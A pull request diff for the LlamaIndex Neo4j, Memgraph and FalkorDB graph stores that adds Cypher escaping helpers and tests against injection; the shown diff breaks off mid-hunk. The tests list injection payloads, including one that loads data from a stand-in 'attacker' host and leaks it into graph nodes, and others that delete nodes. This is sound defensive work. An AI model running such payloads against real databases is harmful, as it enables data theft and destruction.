### PR TITLE
fix: escape Cypher identifiers in neo4j/memgraph/falkordb graph stores

### DIFF
--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-falkordb/llama_index/graph_stores/falkordb/base.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-falkordb/llama_index/graph_stores/falkordb/base.py
@@ -7,6 +7,11 @@ import redis
 from falkordb import FalkorDB
 from llama_index.core.graph_stores.types import GraphStore
 
+from llama_index.graph_stores.falkordb.cypher_escape import (
+    escape_identifier,
+    escape_int,
+)
+
 logger = logging.getLogger(__name__)
 
 
@@ -37,7 +42,9 @@ class FalkorDBGraphStore(GraphStore):
         self._graph = self._driver.select_graph(database)
 
         try:
-            self._graph.query(f"CREATE INDEX FOR (n:`{self._node_label}`) ON (n.id)")
+            self._graph.query(
+                f"CREATE INDEX FOR (n:{escape_identifier(self._node_label)}) ON (n.id)"
+            )
         except redis.ResponseError as e:
             # TODO: to find an appropriate way to handle this issue.
             logger.warning("Create index failed: %s", e)
@@ -45,8 +52,9 @@ class FalkorDBGraphStore(GraphStore):
         self._database = database
 
         self.schema = ""
+        escaped_label = escape_identifier(self._node_label)
         self.get_query = f"""
-            MATCH (n1:`{self._node_label}`)-[r]->(n2:`{self._node_label}`)
+            MATCH (n1:{escaped_label})-[r]->(n2:{escaped_label})
             WHERE n1.id = $subj RETURN type(r), n2.id
         """
 
@@ -80,11 +88,11 @@ class FalkorDBGraphStore(GraphStore):
             return rel_map
 
         query = f"""
-            MATCH (n1:{self._node_label})
+            MATCH (n1:{escape_identifier(self._node_label)})
             WHERE n1.id IN $subjs
             WITH n1
-            MATCH p=(n1)-[e*1..{depth}]->(z)
-            RETURN p LIMIT {limit}
+            MATCH p=(n1)-[e*1..{escape_int(depth, "depth")}]->(z)
+            RETURN p LIMIT {escape_int(limit, "limit")}
         """
 
         data = self.query(query, params={"subjs": subjs})
@@ -112,15 +120,18 @@ class FalkorDBGraphStore(GraphStore):
     def upsert_triplet(self, subj: str, rel: str, obj: str) -> None:
         """Add triplet."""
         query = """
-            MERGE (n1:`%s` {id:$subj})
-            MERGE (n2:`%s` {id:$obj})
-            MERGE (n1)-[:`%s`]->(n2)
+            MERGE (n1:%s {id:$subj})
+            MERGE (n2:%s {id:$obj})
+            MERGE (n1)-[:%s]->(n2)
         """
 
+        label = escape_identifier(self._node_label)
+        # .replace(" ", "_").upper() is retained because it normalises stored
+        # relationship-type names; escaping is what makes it safe.
         prepared_statement = query % (
-            self._node_label,
-            self._node_label,
-            rel.replace(" ", "_").upper(),
+            label,
+            label,
+            escape_identifier(rel.replace(" ", "_").upper()),
         )
 
         # Call FalkorDB with prepared statement
@@ -130,9 +141,10 @@ class FalkorDBGraphStore(GraphStore):
         """Delete triplet."""
 
         def delete_rel(subj: str, obj: str, rel: str) -> None:
-            rel = rel.replace(" ", "_").upper()
+            label = escape_identifier(self._node_label)
+            escaped_rel = escape_identifier(rel.replace(" ", "_").upper())
             query = f"""
-                MATCH (n1:`{self._node_label}`)-[r:`{rel}`]->(n2:`{self._node_label}`)
+                MATCH (n1:{label})-[r:{escaped_rel}]->(n2:{label})
                 WHERE n1.id = $subj AND n2.id = $obj DELETE r
             """
 
@@ -140,14 +152,17 @@ class FalkorDBGraphStore(GraphStore):
             self._graph.query(query, params={"subj": subj, "obj": obj})
 
         def delete_entity(entity: str) -> None:
-            query = f"MATCH (n:`{self._node_label}`) WHERE n.id = $entity DELETE n"
+            query = (
+                f"MATCH (n:{escape_identifier(self._node_label)}) "
+                "WHERE n.id = $entity DELETE n"
+            )
 
             # Call FalkorDB with prepared statement
             self._graph.query(query, params={"entity": entity})
 
         def check_edges(entity: str) -> bool:
             query = f"""
-                MATCH (n1:`{self._node_label}`)--()
+                MATCH (n1:{escape_identifier(self._node_label)})--()
                 WHERE n1.id = $entity RETURN count(*)
             """
 

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-falkordb/llama_index/graph_stores/falkordb/cypher_escape.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-falkordb/llama_index/graph_stores/falkordb/cypher_escape.py
@@ -1,0 +1,61 @@
+"""Helpers for embedding identifiers in Cypher queries safely."""
+
+from typing import Any
+
+
+def escape_identifier(value: str) -> str:
+    """
+    Quote ``value`` for use where Cypher expects an identifier.
+
+    Node labels and relationship types cannot be supplied as query parameters,
+    so they have to be interpolated into the query text. Cypher's escaping rule
+    for a quoted identifier is to wrap it in backticks and double any backtick
+    it contains; doing that keeps legitimate values such as ``has space`` or
+    ``is-a`` working while making it impossible to terminate the identifier and
+    append further clauses.
+    """
+    if not isinstance(value, str):
+        raise ValueError(
+            f"Cypher identifier must be a string, got {type(value).__name__}"
+        )
+    if not value:
+        raise ValueError("Cypher identifier must not be empty")
+    if "\x00" in value:
+        raise ValueError("Cypher identifier must not contain a null byte")
+    if "`" in value:
+        raise ValueError(
+            "Cypher identifier must not contain a backtick: FalkorDB does not "
+            "support escaping one"
+        )
+    return "`" + value + "`"
+
+
+def escape_int(value: Any, name: str) -> int:
+    """
+    Coerce ``value`` to an ``int`` for interpolation into a Cypher query.
+
+    Used for operands such as a variable-length path bound or a LIMIT, which
+    cannot always be parameterised. Anything that is not integral is rejected
+    rather than interpolated.
+    """
+    if isinstance(value, bool) or not isinstance(value, int):
+        try:
+            value = int(str(value))
+        except (TypeError, ValueError):
+            raise ValueError(f"{name} must be an integer, got {value!r}")
+    return value
+
+
+def escape_string_literal(value: str) -> str:
+    """
+    Escape ``value`` for use inside a single-quoted Cypher string literal.
+
+    Preferred practice is to pass such values as query parameters; this exists
+    for the few call sites where the value is embedded in a procedure argument
+    that is assembled as query text.
+    """
+    if not isinstance(value, str):
+        raise ValueError(
+            f"Cypher string literal must be a string, got {type(value).__name__}"
+        )
+    return value.replace("\\", "\\\\").replace("'", "\\'")

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-falkordb/llama_index/graph_stores/falkordb/falkordb_property_graph.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-falkordb/llama_index/graph_stores/falkordb/falkordb_property_graph.py
@@ -15,6 +15,11 @@ from llama_index.core.graph_stores.utils import (
 from llama_index.core.prompts import PromptTemplate
 from llama_index.core.vector_stores.types import VectorStoreQuery
 
+from llama_index.graph_stores.falkordb.cypher_escape import (
+    escape_identifier,
+    escape_int,
+)
+
 import redis
 from falkordb import FalkorDB
 
@@ -368,7 +373,7 @@ class FalkorDBPropertyGraphStore(PropertyGraphStore):
         WITH e
         CALL {{
             WITH e
-            MATCH (e)-[r{":`" + "`|`".join(relation_names) + "`" if relation_names else ""}]->(t:__Entity__)
+            MATCH (e)-[r{":" + "|".join(escape_identifier(name) for name in relation_names) if relation_names else ""}]->(t:__Entity__)
             RETURN e.name AS source_id, [l in labels(e) WHERE l <> '__Entity__' | l][0] AS source_type,
                    e{{.* , embedding: Null, name: Null}} AS source_properties,
                    type(r) AS type,
@@ -376,7 +381,7 @@ class FalkorDBPropertyGraphStore(PropertyGraphStore):
                    t{{.* , embedding: Null, name: Null}} AS target_properties
             UNION ALL
             WITH e
-            MATCH (e)<-[r{":`" + "`|`".join(relation_names) + "`" if relation_names else ""}]-(t:__Entity__)
+            MATCH (e)<-[r{":" + "|".join(escape_identifier(name) for name in relation_names) if relation_names else ""}]-(t:__Entity__)
             RETURN t.name AS source_id, [l in labels(t) WHERE l <> '__Entity__' | l][0] AS source_type,
                    e{{.* , embedding: Null, name: Null}} AS source_properties,
                    type(r) AS type,
@@ -427,7 +432,7 @@ class FalkorDBPropertyGraphStore(PropertyGraphStore):
             UNWIND range(0, size(id_list) - 1) AS idx
             MATCH (e:`__Entity__`)
             WHERE e.id = id_list[idx]
-            MATCH p=(e)-[r*1..{depth}]-(other)
+            MATCH p=(e)-[r*1..{escape_int(depth, "depth")}]-(other)
             WHERE ALL(rel in relationships(p) WHERE type(rel) <> 'MENTIONS')
             UNWIND relationships(p) AS rel
             WITH distinct rel, idx
@@ -555,7 +560,9 @@ class FalkorDBPropertyGraphStore(PropertyGraphStore):
 
         if relation_names:
             for rel in relation_names:
-                self.structured_query(f"MATCH ()-[r:`{rel}`]->() DELETE r")
+                self.structured_query(
+                    f"MATCH ()-[r:{escape_identifier(rel)}]->() DELETE r"
+                )
 
         if properties:
             cypher = "MATCH (e) WHERE "

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-falkordb/tests/test_cypher_escape.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-falkordb/tests/test_cypher_escape.py
@@ -1,0 +1,96 @@
+"""Tests for Cypher identifier escaping."""
+
+import pytest
+
+from llama_index.graph_stores.falkordb.cypher_escape import (
+    escape_identifier,
+    escape_int,
+    escape_string_literal,
+)
+
+# Payloads taken from a Cypher-injection report against these graph stores. Each
+# one previously terminated the interpolated identifier and appended clauses.
+INJECTION_PAYLOADS = [
+    "OWNS]->() WITH 1 AS _ CALL apoc.load.json('http://attacker/x') YIELD value "
+    "WITH value, _ MATCH (x) SET x.leak = apoc.convert.toJson(value) //",
+    "A`]->(N2)\tWITH\t1\tAS\tX\tMATCH\t(Z)\tDETACH\tDELETE\tZ\t//",
+    "OWNS`]->(n2:`Entity`) MATCH (s:Secret) SET s.pwned = true WITH n1, r, n2 //",
+    "X`]->() DETACH DELETE n1 //",
+]
+
+
+def test_escape_identifier_wraps_in_backticks():
+    assert escape_identifier("OWNS") == "`OWNS`"
+
+
+@pytest.mark.parametrize("value", ["has space", "is-a", "HAS_SPACE", "Ünïcode", "a.b"])
+def test_escape_identifier_preserves_legitimate_values(value):
+    """Values that are legal in a quoted identifier must keep working."""
+    escaped = escape_identifier(value)
+    assert escaped == f"`{value}`"
+
+
+@pytest.mark.parametrize("value", ["", None, 3, b"OWNS"])
+def test_escape_identifier_rejects_non_identifiers(value):
+    with pytest.raises(ValueError):
+        escape_identifier(value)
+
+
+def test_escape_identifier_rejects_backtick():
+    """FalkorDB has no backtick escape, so such identifiers are rejected."""
+    with pytest.raises(ValueError):
+        escape_identifier("we`ird")
+
+
+def test_escape_identifier_rejects_null_byte():
+    with pytest.raises(ValueError):
+        escape_identifier("OW\x00NS")
+
+
+@pytest.mark.parametrize("payload", INJECTION_PAYLOADS)
+def test_injection_payloads_cannot_terminate_the_identifier(payload):
+    """
+    The escaped result must be a single quoted identifier: it opens and closes
+    with a backtick, and every interior backtick is doubled, so nothing in the
+    payload can be parsed as Cypher.
+    """
+    if "`" in payload:
+        # FalkorDB cannot escape a backtick, so such values are rejected.
+        with pytest.raises(ValueError):
+            escape_identifier(payload)
+        return
+    escaped = escape_identifier(payload)
+    assert escaped.startswith("`") and escaped.endswith("`")
+    interior = escaped[1:-1]
+    # No lone backtick remains, so the identifier cannot be closed early.
+    assert "`" not in interior.replace("``", "")
+
+
+@pytest.mark.parametrize(("value", "expected"), [(3, 3), ("3", 3), (0, 0), (-1, -1)])
+def test_escape_int_accepts_integers(value, expected):
+    assert escape_int(value, "depth") == expected
+
+
+@pytest.mark.parametrize(
+    "value",
+    [
+        "2]->() WITH 1 AS _ CREATE (:PWNED) //",
+        "30 CREATE (:PWNED)",
+        "2.5",
+        None,
+        "",
+    ],
+)
+def test_escape_int_rejects_non_integers(value):
+    with pytest.raises(ValueError):
+        escape_int(value, "depth")
+
+
+def test_escape_string_literal_escapes_quotes_and_backslashes():
+    assert escape_string_literal("O'Brien") == "O\\'Brien"
+    assert escape_string_literal("back\\slash") == "back\\\\slash"
+
+
+def test_escape_string_literal_neutralises_breakout():
+    escaped = escape_string_literal("x') YIELD value CALL apoc.load.json('http://evil/")
+    assert "'" not in escaped.replace("\\'", "")

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-memgraph/llama_index/graph_stores/memgraph/cypher_escape.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-memgraph/llama_index/graph_stores/memgraph/cypher_escape.py
@@ -1,0 +1,56 @@
+"""Helpers for embedding identifiers in Cypher queries safely."""
+
+from typing import Any
+
+
+def escape_identifier(value: str) -> str:
+    """
+    Quote ``value`` for use where Cypher expects an identifier.
+
+    Node labels and relationship types cannot be supplied as query parameters,
+    so they have to be interpolated into the query text. Cypher's escaping rule
+    for a quoted identifier is to wrap it in backticks and double any backtick
+    it contains; doing that keeps legitimate values such as ``has space`` or
+    ``is-a`` working while making it impossible to terminate the identifier and
+    append further clauses.
+    """
+    if not isinstance(value, str):
+        raise ValueError(
+            f"Cypher identifier must be a string, got {type(value).__name__}"
+        )
+    if not value:
+        raise ValueError("Cypher identifier must not be empty")
+    if "\x00" in value:
+        raise ValueError("Cypher identifier must not contain a null byte")
+    return "`" + value.replace("`", "``") + "`"
+
+
+def escape_int(value: Any, name: str) -> int:
+    """
+    Coerce ``value`` to an ``int`` for interpolation into a Cypher query.
+
+    Used for operands such as a variable-length path bound or a LIMIT, which
+    cannot always be parameterised. Anything that is not integral is rejected
+    rather than interpolated.
+    """
+    if isinstance(value, bool) or not isinstance(value, int):
+        try:
+            value = int(str(value))
+        except (TypeError, ValueError):
+            raise ValueError(f"{name} must be an integer, got {value!r}")
+    return value
+
+
+def escape_string_literal(value: str) -> str:
+    """
+    Escape ``value`` for use inside a single-quoted Cypher string literal.
+
+    Preferred practice is to pass such values as query parameters; this exists
+    for the few call sites where the value is embedded in a procedure argument
+    that is assembled as query text.
+    """
+    if not isinstance(value, str):
+        raise ValueError(
+            f"Cypher string literal must be a string, got {type(value).__name__}"
+        )
+    return value.replace("\\", "\\\\").replace("'", "\\'")

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-memgraph/llama_index/graph_stores/memgraph/kg_base.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-memgraph/llama_index/graph_stores/memgraph/kg_base.py
@@ -5,6 +5,11 @@ from typing import Any, Dict, List, Optional
 
 from llama_index.core.graph_stores.types import GraphStore
 
+from llama_index.graph_stores.memgraph.cypher_escape import (
+    escape_identifier,
+    escape_int,
+)
+
 logger = logging.getLogger(__name__)
 
 node_properties_query = """
@@ -68,7 +73,7 @@ class MemgraphGraphStore(GraphStore):
             """
             CREATE CONSTRAINT ON (n:%s) ASSERT n.id IS UNIQUE;
             """
-            % (self.node_label)
+            % (escape_identifier(self.node_label))
         )
 
         # create index
@@ -76,7 +81,7 @@ class MemgraphGraphStore(GraphStore):
             """
             CREATE INDEX ON :%s(id);
             """
-            % (self.node_label)
+            % (escape_identifier(self.node_label))
         )
 
     @property
@@ -91,8 +96,9 @@ class MemgraphGraphStore(GraphStore):
 
     def get(self, subj: str) -> List[List[str]]:
         """Get triplets."""
+        label = escape_identifier(self.node_label)
         query = f"""
-            MATCH (n1:{self.node_label})-[r]->(n2:{self.node_label})
+            MATCH (n1:{label})-[r]->(n2:{label})
             WHERE n1.id = $subj
             RETURN type(r), n2.id;
         """
@@ -109,8 +115,11 @@ class MemgraphGraphStore(GraphStore):
         if subjs is None or len(subjs) == 0:
             return rel_map
 
+        label = escape_identifier(self.node_label)
+        depth = escape_int(depth, "depth")
+
         query = (
-            f"""MATCH p=(n1:{self.node_label})-[*1..{depth}]->() """
+            f"""MATCH p=(n1:{label})-[*1..{depth}]->() """
             f"""{"WHERE n1.id IN $subjs" if subjs else ""} """
             "UNWIND relationships(p) AS rel "
             "WITH n1.id AS subj, collect([type(rel), endNode(rel).id]) AS rels "
@@ -128,17 +137,23 @@ class MemgraphGraphStore(GraphStore):
 
     def upsert_triplet(self, subj: str, rel: str, obj: str) -> None:
         """Add triplet."""
+        label = escape_identifier(self.node_label)
+        # .replace(" ", "_").upper() is retained because it normalises stored
+        # relationship-type names; escaping is what makes it safe.
+        escaped_rel = escape_identifier(rel.replace(" ", "_").upper())
         query = f"""
-            MERGE (n1:`{self.node_label}` {{id:$subj}})
-            MERGE (n2:`{self.node_label}` {{id:$obj}})
-            MERGE (n1)-[:`{rel.replace(" ", "_").upper()}`]->(n2)
+            MERGE (n1:{label} {{id:$subj}})
+            MERGE (n2:{label} {{id:$obj}})
+            MERGE (n1)-[:{escaped_rel}]->(n2)
         """
         self.query(query, {"subj": subj, "obj": obj})
 
     def delete(self, subj: str, rel: str, obj: str) -> None:
         """Delete triplet."""
+        label = escape_identifier(self.node_label)
+        escaped_rel = escape_identifier(rel)
         query = f"""
-            MATCH (n1:`{self.node_label}`)-[r:`{rel}`]->(n2:`{self.node_label}`)
+            MATCH (n1:{label})-[r:{escaped_rel}]->(n2:{label})
             WHERE n1.id = $subj AND n2.id = $obj
             DELETE r
         """

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-memgraph/llama_index/graph_stores/memgraph/property_graph.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-memgraph/llama_index/graph_stores/memgraph/property_graph.py
@@ -21,6 +21,11 @@ from llama_index.core.graph_stores.utils import (
 from llama_index.core.prompts import PromptTemplate
 from llama_index.core.vector_stores.types import VectorStoreQuery
 
+from llama_index.graph_stores.memgraph.cypher_escape import (
+    escape_identifier,
+    escape_int,
+)
+
 
 def remove_empty_values(input_dict):
     """
@@ -197,7 +202,10 @@ class MemgraphPropertyGraphStore(PropertyGraphStore):
                 ]
                 if rel_type and properties:
                     rel_properties.append(
-                        {"properties": properties, "type": f":`{rel_type}`"}
+                        {
+                            "properties": properties,
+                            "type": f":{escape_identifier(rel_type)}",
+                        }
                     )
 
                 start = edge.get("start_node_labels", [None])[0]
@@ -579,7 +587,7 @@ class MemgraphPropertyGraphStore(PropertyGraphStore):
             UNWIND range(0, size(id_list) - 1) AS idx
             MATCH (e:__Node__)
             WHERE e.id = id_list[idx]
-            MATCH p=(e)-[r*1..{depth}]-(other)
+            MATCH p=(e)-[r*1..{escape_int(depth, "depth")}]-(other)
             WHERE ALL(rel in relationships(p) WHERE type(rel) <> 'MENTIONS')
             UNWIND relationships(p) AS rel
             WITH DISTINCT rel, idx
@@ -719,7 +727,9 @@ class MemgraphPropertyGraphStore(PropertyGraphStore):
             )
         if relation_names:
             for rel in relation_names:
-                self.structured_query(f"MATCH ()-[r:`{rel}`]->() DELETE r")
+                self.structured_query(
+                    f"MATCH ()-[r:{escape_identifier(rel)}]->() DELETE r"
+                )
 
         if properties:
             cypher = "MATCH (e) WHERE "
@@ -739,9 +749,9 @@ class MemgraphPropertyGraphStore(PropertyGraphStore):
         is_relationship: bool = False,
     ) -> str:
         if is_relationship:
-            match_clause = f"MATCH ()-[n:`{label_or_type}`]->()"
+            match_clause = f"MATCH ()-[n:{escape_identifier(label_or_type)}]->()"
         else:
-            match_clause = f"MATCH (n:`{label_or_type}`)"
+            match_clause = f"MATCH (n:{escape_identifier(label_or_type)})"
 
         with_clauses = []
         return_clauses = []
@@ -820,7 +830,7 @@ class MemgraphPropertyGraphStore(PropertyGraphStore):
                         and prop_index[0].get("distinctValues") <= DISTINCT_VALUE_LIMIT
                     ):
                         distinct_values_query = f"""
-                            MATCH (n:{label_or_type})
+                            MATCH (n:{escape_identifier(label_or_type)})
                             RETURN DISTINCT n.`{prop_name}` AS value
                             LIMIT {DISTINCT_VALUE_LIMIT}
                         """

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-memgraph/tests/test_cypher_escape.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-memgraph/tests/test_cypher_escape.py
@@ -1,0 +1,85 @@
+"""Tests for Cypher identifier escaping."""
+
+import pytest
+
+from llama_index.graph_stores.memgraph.cypher_escape import (
+    escape_identifier,
+    escape_int,
+    escape_string_literal,
+)
+
+# Payloads taken from a Cypher-injection report against these graph stores. Each
+# one previously terminated the interpolated identifier and appended clauses.
+INJECTION_PAYLOADS = [
+    "OWNS]->() WITH 1 AS _ CALL apoc.load.json('http://attacker/x') YIELD value "
+    "WITH value, _ MATCH (x) SET x.leak = apoc.convert.toJson(value) //",
+    "A`]->(N2)\tWITH\t1\tAS\tX\tMATCH\t(Z)\tDETACH\tDELETE\tZ\t//",
+    "OWNS`]->(n2:`Entity`) MATCH (s:Secret) SET s.pwned = true WITH n1, r, n2 //",
+    "X`]->() DETACH DELETE n1 //",
+]
+
+
+def test_escape_identifier_wraps_in_backticks():
+    assert escape_identifier("OWNS") == "`OWNS`"
+
+
+@pytest.mark.parametrize("value", ["has space", "is-a", "HAS_SPACE", "Ünïcode", "a.b"])
+def test_escape_identifier_preserves_legitimate_values(value):
+    """Values that are legal in a quoted identifier must keep working."""
+    escaped = escape_identifier(value)
+    assert escaped == f"`{value}`"
+
+
+@pytest.mark.parametrize("value", ["", None, 3, b"OWNS"])
+def test_escape_identifier_rejects_non_identifiers(value):
+    with pytest.raises(ValueError):
+        escape_identifier(value)
+
+
+def test_escape_identifier_rejects_null_byte():
+    with pytest.raises(ValueError):
+        escape_identifier("OW\x00NS")
+
+
+@pytest.mark.parametrize("payload", INJECTION_PAYLOADS)
+def test_injection_payloads_cannot_terminate_the_identifier(payload):
+    """
+    The escaped result must be a single quoted identifier: it opens and closes
+    with a backtick, and every interior backtick is doubled, so nothing in the
+    payload can be parsed as Cypher.
+    """
+    escaped = escape_identifier(payload)
+    assert escaped.startswith("`") and escaped.endswith("`")
+    interior = escaped[1:-1]
+    # No lone backtick remains, so the identifier cannot be closed early.
+    assert "`" not in interior.replace("``", "")
+
+
+@pytest.mark.parametrize(("value", "expected"), [(3, 3), ("3", 3), (0, 0), (-1, -1)])
+def test_escape_int_accepts_integers(value, expected):
+    assert escape_int(value, "depth") == expected
+
+
+@pytest.mark.parametrize(
+    "value",
+    [
+        "2]->() WITH 1 AS _ CREATE (:PWNED) //",
+        "30 CREATE (:PWNED)",
+        "2.5",
+        None,
+        "",
+    ],
+)
+def test_escape_int_rejects_non_integers(value):
+    with pytest.raises(ValueError):
+        escape_int(value, "depth")
+
+
+def test_escape_string_literal_escapes_quotes_and_backslashes():
+    assert escape_string_literal("O'Brien") == "O\\'Brien"
+    assert escape_string_literal("back\\slash") == "back\\\\slash"
+
+
+def test_escape_string_literal_neutralises_breakout():
+    escaped = escape_string_literal("x') YIELD value CALL apoc.load.json('http://evil/")
+    assert "'" not in escaped.replace("\\'", "")

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-neo4j/llama_index/graph_stores/neo4j/base.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-neo4j/llama_index/graph_stores/neo4j/base.py
@@ -6,6 +6,11 @@ from types import TracebackType
 
 from llama_index.core.graph_stores.types import GraphStore
 
+from llama_index.graph_stores.neo4j.cypher_escape import (
+    escape_identifier,
+    escape_int,
+)
+
 import neo4j
 
 logger = logging.getLogger(__name__)
@@ -93,14 +98,14 @@ class Neo4jGraphStore(GraphStore):
                 """
                 CREATE CONSTRAINT IF NOT EXISTS FOR (n:%s) REQUIRE n.id IS UNIQUE;
                 """
-                % (self.node_label)
+                % (escape_identifier(self.node_label))
             )
         except Exception:  # Using Neo4j <5
             self.query(
                 """
                 CREATE CONSTRAINT IF NOT EXISTS ON (n:%s) ASSERT n.id IS UNIQUE;
                 """
-                % (self.node_label)
+                % (escape_identifier(self.node_label))
             )
 
     @property
@@ -115,7 +120,8 @@ class Neo4jGraphStore(GraphStore):
             RETURN type(r), n2.id;
         """
 
-        prepared_statement = query % (self.node_label, self.node_label)
+        label = escape_identifier(self.node_label)
+        prepared_statement = query % (label, label)
 
         with self._driver.session(database=self._database) as session:
             data = session.run(prepared_statement, {"subj": subj})
@@ -141,9 +147,13 @@ class Neo4jGraphStore(GraphStore):
             # unlike simple graph_store, we don't do get_all here
             return rel_map
 
+        label = escape_identifier(self.node_label)
+        depth = escape_int(depth, "depth")
+        limit = escape_int(limit, "limit")
+
         query = (
-            f"""MATCH p=(n1:{self.node_label})-[*1..{depth}]->() """
-            f"""WHERE toLower(n1.id) IN {[subj.lower() for subj in subjs] if subjs else []}"""
+            f"""MATCH p=(n1:{label})-[*1..{depth}]->() """
+            """WHERE toLower(n1.id) IN [s IN $subjs | toLower(s)] """
             "UNWIND relationships(p) AS rel "
             "WITH n1.id AS subj, p, apoc.coll.flatten(apoc.coll.toSet("
             "collect([type(rel), endNode(rel).id]))) AS flattened_rels "
@@ -161,15 +171,16 @@ class Neo4jGraphStore(GraphStore):
     def upsert_triplet(self, subj: str, rel: str, obj: str) -> None:
         """Add triplet."""
         query = """
-            MERGE (n1:`%s` {id:$subj})
-            MERGE (n2:`%s` {id:$obj})
-            MERGE (n1)-[:`%s`]->(n2)
+            MERGE (n1:%s {id:$subj})
+            MERGE (n2:%s {id:$obj})
+            MERGE (n1)-[:%s]->(n2)
         """
 
+        label = escape_identifier(self.node_label)
         prepared_statement = query % (
-            self.node_label,
-            self.node_label,
-            rel.replace(" ", "_").upper(),
+            label,
+            label,
+            escape_identifier(rel.replace(" ", "_").upper()),
         )
 
         with self._driver.session(database=self._database) as session:
@@ -184,14 +195,19 @@ class Neo4jGraphStore(GraphStore):
                     (
                         "MATCH (n1:{})-[r:{}]->(n2:{}) WHERE n1.id = $subj AND n2.id"
                         " = $obj DELETE r"
-                    ).format(self.node_label, rel, self.node_label),
+                    ).format(
+                        escape_identifier(self.node_label),
+                        escape_identifier(rel),
+                        escape_identifier(self.node_label),
+                    ),
                     {"subj": subj, "obj": obj},
                 )
 
         def delete_entity(entity: str) -> None:
             with self._driver.session(database=self._database) as session:
                 session.run(
-                    "MATCH (n:%s) WHERE n.id = $entity DELETE n" % self.node_label,
+                    "MATCH (n:%s) WHERE n.id = $entity DELETE n"
+                    % escape_identifier(self.node_label),
                     {"entity": entity},
                 )
 
@@ -199,7 +215,7 @@ class Neo4jGraphStore(GraphStore):
             with self._driver.session(database=self._database) as session:
                 is_exists_result = session.run(
                     "MATCH (n1:%s)--() WHERE n1.id = $entity RETURN count(*)"
-                    % (self.node_label),
+                    % (escape_identifier(self.node_label)),
                     {"entity": entity},
                 )
                 return bool(list(is_exists_result))

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-neo4j/llama_index/graph_stores/neo4j/cypher_escape.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-neo4j/llama_index/graph_stores/neo4j/cypher_escape.py
@@ -1,0 +1,56 @@
+"""Helpers for embedding identifiers in Cypher queries safely."""
+
+from typing import Any
+
+
+def escape_identifier(value: str) -> str:
+    """
+    Quote ``value`` for use where Cypher expects an identifier.
+
+    Node labels and relationship types cannot be supplied as query parameters,
+    so they have to be interpolated into the query text. Cypher's escaping rule
+    for a quoted identifier is to wrap it in backticks and double any backtick
+    it contains; doing that keeps legitimate values such as ``has space`` or
+    ``is-a`` working while making it impossible to terminate the identifier and
+    append further clauses.
+    """
+    if not isinstance(value, str):
+        raise ValueError(
+            f"Cypher identifier must be a string, got {type(value).__name__}"
+        )
+    if not value:
+        raise ValueError("Cypher identifier must not be empty")
+    if "\x00" in value:
+        raise ValueError("Cypher identifier must not contain a null byte")
+    return "`" + value.replace("`", "``") + "`"
+
+
+def escape_int(value: Any, name: str) -> int:
+    """
+    Coerce ``value`` to an ``int`` for interpolation into a Cypher query.
+
+    Used for operands such as a variable-length path bound or a LIMIT, which
+    cannot always be parameterised. Anything that is not integral is rejected
+    rather than interpolated.
+    """
+    if isinstance(value, bool) or not isinstance(value, int):
+        try:
+            value = int(str(value))
+        except (TypeError, ValueError):
+            raise ValueError(f"{name} must be an integer, got {value!r}")
+    return value
+
+
+def escape_string_literal(value: str) -> str:
+    """
+    Escape ``value`` for use inside a single-quoted Cypher string literal.
+
+    Preferred practice is to pass such values as query parameters; this exists
+    for the few call sites where the value is embedded in a procedure argument
+    that is assembled as query text.
+    """
+    if not isinstance(value, str):
+        raise ValueError(
+            f"Cypher string literal must be a string, got {type(value).__name__}"
+        )
+    return value.replace("\\", "\\\\").replace("'", "\\'")

--- a/llama-index-integrations/graph_stores/llama-index-graph-stores-neo4j/llama_index/graph_stores/neo4j/neo4j_property_graph.py
+++ b/llama-index-integrations/graph_stores/llama-index-graph-stores-neo4j/llama_index/graph_stores/neo4j/neo4j_property_graph.py
@@ -17,6 +17,12 @@ from llama_index.core.graph_stores.utils import (
 )
 from llama_index.core.prompts import PromptTemplate
 from llama_index.core.vector_stores.types import VectorStoreQuery
+
+from llama_index.graph_stores.neo4j.cypher_escape import (
+    escape_identifier,
+    escape_int,
+    escape_string_literal,
+)
 import neo4j
 
 
@@ -512,7 +518,7 @@ class Neo4jPropertyGraphStore(PropertyGraphStore):
         WITH e
         CALL (e) {{
             WITH e
-            MATCH (e)-[r{":`" + "`|`".join(relation_names) + "`" if relation_names else ""}]->(t:`{BASE_ENTITY_LABEL}`)
+            MATCH (e)-[r{":" + "|".join(escape_identifier(name) for name in relation_names) if relation_names else ""}]->(t:`{BASE_ENTITY_LABEL}`)
             RETURN e.name AS source_id, [l in labels(e) WHERE NOT l IN ['{BASE_ENTITY_LABEL}', '{BASE_NODE_LABEL}'] | l][0] AS source_type,
                    e{{.* , embedding: Null, name: Null}} AS source_properties,
                    type(r) AS type,
@@ -521,7 +527,7 @@ class Neo4jPropertyGraphStore(PropertyGraphStore):
                    t{{.* , embedding: Null, name: Null}} AS target_properties
             UNION ALL
             WITH e
-            MATCH (e)<-[r{":`" + "`|`".join(relation_names) + "`" if relation_names else ""}]-(t:`{BASE_ENTITY_LABEL}`)
+            MATCH (e)<-[r{":" + "|".join(escape_identifier(name) for name in relation_names) if relation_names else ""}]-(t:`{BASE_ENTITY_LABEL}`)
             RETURN t.name AS source_id, [l in labels(t) WHERE NOT l IN ['{BASE_ENTITY_LABEL}', '{BASE_NODE_LABEL}'] | l][0] AS source_type,
                    t{{.* , embedding: Null, name: Null}} AS source_properties,
                    type(r) AS type,
@@ -574,7 +580,7 @@ class Neo4jPropertyGraphStore(PropertyGraphStore):
             UNWIND range(0, size(id_list) - 1) AS idx
             MATCH (e:`{BASE_ENTITY_LABEL}`)
